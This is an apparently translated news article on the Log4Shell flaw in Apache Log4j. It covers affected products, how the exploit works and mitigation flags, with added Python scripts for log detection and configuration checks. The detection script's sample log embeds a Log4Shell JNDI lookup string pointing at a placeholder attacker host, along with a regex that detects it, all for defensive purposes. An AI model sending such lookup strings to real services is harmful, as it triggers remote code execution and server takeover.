2021-12-11

An urgent update has arrived for Log4j: a zero-day vulnerability has been discovered that puts nearly every business application running Java at risk of attack, along with many websites, applications and well-known services including Minecraft, iCloud, Twitter and Steam. According to several security researchers, the bug allows attackers to take control of servers and clients. The threat has been dubbed Log4j, after the vulnerable library.

Log4j vulnerability

It was therefore the Apache Software Foundation that released an emergency security update fixing the zero-day vulnerability (tracked as CVE-2021-44228) in the popular Log4j logging library, which is part of the Apache Logging Project. The patch shipped as part of version 2.15.0.

The vulnerability has been named Log4Shell and scores 10 out of 10 on the CVSS severity scale. The bug allows unauthenticated remote code execution (RCE). The problem is compounded by the fact that yesterday the cybersecurity researcher p0rz9 already posted a proof-of-concept exploit on Twitter, showing that the vulnerability can be exploited remotely and that doing so requires no special technical skill.

How Log4Shell works

Security company LunaSec describes how Log4Shell works on its blog: the vulnerability lets an attacker make Java-based applications and servers that use the Log4j library log a specific string. When the application or server processes that log entry, the string causes a malicious script to be downloaded from a domain controlled by the attacker and executed on the vulnerable system. The result is a complete takeover of the vulnerable application or server.

The sites and apps affected

The problem was originally discovered while hunting for bugs on Minecraft servers, but Log4j is present in almost all Java business applications and servers.

For example, the library can be found in almost all enterprise products released by the Apache Software Foundation, including Apache Struts, Apache Flink, Apache Druid, Apache Flume, Apache Solr, Apache Kafka, Apache Dubbo and so on. Log4j is also actively used in various open source projects, including Redis, ElasticSearch, Elastic Logstash, Ghidra and others.

Therefore, even companies that merely use one of these products are indirectly vulnerable to Log4Shell attacks. Information security specialists are already reporting that solutions from giants such as Apple (iCloud), Amazon, Twitter, Cloudflare, Steam, Tencent, Baidu, DIDI, JD, NetEase and probably thousands of lesser-known companies could be vulnerable to Log4Shell.

Yesterday p0rz9 wrote that CVE-2021-44228 can only be exploited if the parameter log4j2.formatMsgNoLookups is set to false. The Record reports that, according to the KnownSec 404 Team, in Log4j version 2.15.0 this parameter is set to true, specifically to prevent attacks. This means that Log4j users who upgrade to version 2.15.0 and then set the flag back to false will again be vulnerable to attack. Conversely, Log4j users who have not updated but have set the flag to true can still block attacks on previous versions without the update.

Unfortunately, this also means that all previous versions, in which this parameter is set to false by default, are at risk. That is, all previous versions of Log4j, starting with 2.10.0, are vulnerable.

The details of the Log4j threat

Since attackers normally use a DNS logging service (dnslog) to probe the network before launching the actual exploit, it helps to know that common traces of exploitation attempts are “javax.naming.CommunicationException” and “javax.naming.NamingException” entries in the application's error log. The keyword to focus on is “Error looking up JNDI resource”.
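As an added example (not from the article and not LunaSec's or Apache's code), the following Python script runs the indicators this paragraph names over a few constructed log lines: the two JNDI exception names, the “Error looking up JNDI resource” message, and the plain `${jndi:` lookup token in logged request data. The sample log, the `scan_log` and `classify_line` functions and the host name attacker.invalid are all assumptions; the lookup regex only catches the unobfuscated form, so treat the exception-based indicators as the more robust signal.

```python
import re
from typing import Dict, List

# Indicators taken from the article: JNDI exception names that show up in the
# application's error log, and the lookup error message to search for.
EXCEPTION_INDICATORS = (
    "javax.naming.CommunicationException",
    "javax.naming.NamingException",
    "Error looking up JNDI resource",
)

# A Log4j lookup token inside logged request data (assumption: the application
# logs request headers such as User-Agent). Only the plain "${jndi:" form is
# matched; nested or obfuscated lookups need a more elaborate matcher.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# Constructed sample log; "attacker.invalid" is a placeholder host name.
SAMPLE_LOG = """\
2021-12-10T14:02:11Z INFO  app - GET /index.html ua="Mozilla/5.0"
2021-12-10T14:02:13Z INFO  app - GET /login ua="${jndi:ldap://attacker.invalid/x}"
2021-12-10T14:02:13Z ERROR app - Error looking up JNDI resource [ldap://attacker.invalid/x]
2021-12-10T14:02:13Z ERROR app - javax.naming.CommunicationException: attacker.invalid:389
2021-12-10T14:02:20Z INFO  app - GET /health ua="curl/7.79.1"
"""


def classify_line(line: str) -> str:
    """Return an indicator label for one log line, or "" if nothing matched."""
    if JNDI_LOOKUP.search(line):
        return "jndi-lookup-in-request"
    for needle in EXCEPTION_INDICATORS:
        if needle in line:
            return "jndi-exception"
    return ""


def scan_log(text: str) -> List[Dict[str, object]]:
    """Scan a whole log text and return one record per suspicious line."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        label = classify_line(line)
        if label:
            hits.append({"line": lineno, "indicator": label, "text": line})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['indicator']}: {hit['text']}")
```

Point `scan_log` at the application and web-server logs; a lookup hit followed within seconds by a JNDI exception from the same host is the pattern worth escalating, while an exception on its own may just be a misconfigured directory client.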

How to update and mitigate the threat

If you are not yet able to update your Apache application, it is recommended to add the following startup parameter to your Java Virtual Machine (JVM): -Dlog4j2.formatMsgNoLookups=true, as shown in the image below:

Alternatively, add a log4j2.component.properties file to the application classpath with the following content: log4j2.formatMsgNoLookups=true

It is also recommended to verify that the JDK in use is at least version 11.0.1, 8u191, 7u201 or 6u211, or later.
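As an added example (not part of the article and not Apache's own tooling), the following Python helpers check the two mitigations and the JDK floor described above: whether a JVM option string carries -Dlog4j2.formatMsgNoLookups=true, whether a log4j2.component.properties file on the classpath sets the same key, and whether a java.version string meets the minimum levels listed. The function names, the temporary classpath directory and the sample version strings are assumptions.

```python
import re
import tempfile
from pathlib import Path
from typing import Tuple

# The mitigation flag named in the article.
MITIGATION_KEY = "log4j2.formatMsgNoLookups"

# Minimum JDK levels from the article: the update number for the legacy
# 1.x.0_NNN numbering, and a full triple for the 11.x numbering.
MIN_UPDATE_LEGACY = {6: 211, 7: 201, 8: 191}
MIN_VERSION_MODERN = (11, 0, 1)


def jvm_opts_have_mitigation(java_opts: str) -> bool:
    """True if the JVM option string sets -Dlog4j2.formatMsgNoLookups=true."""
    pattern = rf"(^|\s)-D{re.escape(MITIGATION_KEY)}=true(\s|$)"
    return re.search(pattern, java_opts) is not None


def write_component_properties(classpath_dir: Path) -> Path:
    """Create log4j2.component.properties in the given classpath directory."""
    path = classpath_dir / "log4j2.component.properties"
    path.write_text(f"{MITIGATION_KEY}=true\n", encoding="utf-8")
    return path


def properties_have_mitigation(props_file: Path) -> bool:
    """Parse a .properties file (key=value, '#'/'!' comments) for the flag."""
    for raw in props_file.read_text(encoding="utf-8").splitlines():
        line = raw.strip()
        if not line or line[0] in "#!":
            continue
        key, _, value = line.partition("=")
        if key.strip() == MITIGATION_KEY:
            return value.strip().lower() == "true"
    return False


def properties_roundtrip_ok() -> bool:
    """Write the file into a temporary classpath dir and read it back."""
    with tempfile.TemporaryDirectory() as tmp:
        return properties_have_mitigation(write_component_properties(Path(tmp)))


def parse_java_version(version: str) -> Tuple[int, int, int]:
    """Normalise '1.8.0_191' -> (8, 0, 191) and '11.0.1+13' -> (11, 0, 1)."""
    legacy = re.match(r"1\.(\d+)\.(\d+)_(\d+)", version)
    if legacy:
        return int(legacy.group(1)), int(legacy.group(2)), int(legacy.group(3))
    numbers = [int(p) for p in re.split(r"[.+_-]", version) if p.isdigit()]
    numbers += [0, 0, 0]
    return numbers[0], numbers[1], numbers[2]


def jdk_meets_minimum(version: str) -> bool:
    """Compare a java.version string against the article's minimum levels.
    Majors the article does not list (9, 10) are treated as not meeting it."""
    major, minor, update = parse_java_version(version)
    if major in MIN_UPDATE_LEGACY:
        return update >= MIN_UPDATE_LEGACY[major]
    return (major, minor, update) >= MIN_VERSION_MODERN


if __name__ == "__main__":
    # Constructed inputs standing in for a service's real launch options.
    print(jvm_opts_have_mitigation("-Xmx2g -Dlog4j2.formatMsgNoLookups=true -jar app.jar"))
    print(properties_roundtrip_ok())
    for v in ("1.8.0_181", "1.8.0_191", "11.0.1", "17.0.2"):
        print(v, jdk_meets_minimum(v))
```

Feed it the output of `java -version` and the service's actual launch options, and treat a passing check as a stopgap until Log4j itself is upgraded, since neither the flag nor a newer JDK removes the vulnerable code from the application.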

Looking ahead, Dustin Childs of Trend Micro's Zero Day Initiative said he is concerned that the impact of this vulnerability will persist in the coming months because of the large number of affected companies. If organizations run a server based on open source software, there is a “good chance” they are affected by this vulnerability, he said.

“Since there is no definitive list of programs affected by this bug, we are likely to see this vulnerability for a while,” he said. “I wouldn’t be surprised if we find interesting programs in months or even years.”

